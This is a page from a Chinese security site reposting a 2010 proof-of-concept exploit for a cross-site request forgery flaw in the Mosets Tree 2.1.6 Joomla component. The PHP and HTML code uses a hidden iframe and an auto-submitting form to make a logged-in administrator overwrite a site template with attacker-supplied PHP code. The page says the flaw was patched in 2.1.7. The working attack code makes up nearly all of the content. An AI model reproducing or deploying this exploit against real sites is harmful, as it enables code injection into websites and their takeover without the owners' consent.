首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
来源:vfocus.net 作者:jdc 发布时间:2010-11-19  
<?php
/**
  * Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF
  * 3 October 2010
  * jdc
  *
  * How it works - admin template form has no nonce
  * How to exploit - get a logged in admin to click the wrong link ;)
  * Patched in 2.1.7
  */
// change these
$target = 'http://localhost/joomla';
$exploit = '<?php echo phpinfo(); ?>';
/* page - any one of:
page_addCategory
page_addListing
page_advSearchRedirect
page_advSearchResults
page_advSearch
page_claim
page_confirmDelete
page_contactOwner
page_errorListing
page_error
page_gallery
page_image
page_index
page_listAlpha
page_listing
page_listListings
page_ownerListing
page_print
page_recommend
page_replyReview
page_reportReview
page_report
page_searchByResults
page_searchResults
page_subCatIndex
page_usersFavourites
page_usersReview
page_writeReview
sub_alphaIndex
sub_images
sub_listingDetails
sub_listings
sub_listingSummary
sub_map
sub_reviews
sub_subCats
*/
$page = 'page_print';
// don't change these
$path = '/administrator/index.php';
$data = array(
     'pagecontent' => $exploit,
     'template' => 'm2',
     'option' => 'com_mtree',
     'task' => 'save_templatepage',
     'page' => $page
);
?>
<html>
<body>
<?php if (@$_GET['iframe']) : ?>
<form id="csrf" action="<?php echo $target.$path; ?>" method="post">
<?php foreach ($data as $k => $v) : ?>
<input type="text" value="<?php echo htmlspecialchars($v); ?>"
name="<?php echo $k; ?>" />
<?php endforeach; ?>
<script type="text/javascript">
document.forms[0].submit();
</script>
</form>
<?php else : ?>
<h1>Mosets Tree 2.1.6 Template Overwrite CSRF Exploit</h1>
<p>If you were logged in as admin, you just got owned!</p>
<div style="display:none">
<iframe width="1" height="1" src="<?php __FILE__; ?>?iframe=1"></iframe>
</div>
<?php endif; ?>
</body>
</html>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MP3-Nator Buffer Overflow (SEH
·DATAC RealWin SCADA Server Buf
·chCounter <= 3.1.3 SQL Injecti
·Xion Audio Player 1.0.126 Buff
·DIZzy 1.12 Local Stack Overflo
·FreeNAS exec_raw.php Arbitrary
·Trend Micro Internet Security
·Native Instruments Kontakt 4 P
·Native Instruments Traktor Pro
·NetWare 6.5 SunRPC Portmapper
·Native Instruments Service Cen
·Axis2 / SAP BusinessObjects ds
  推荐广告
CopyRight © 2002-2020 VFocuS.Net All Rights Reserved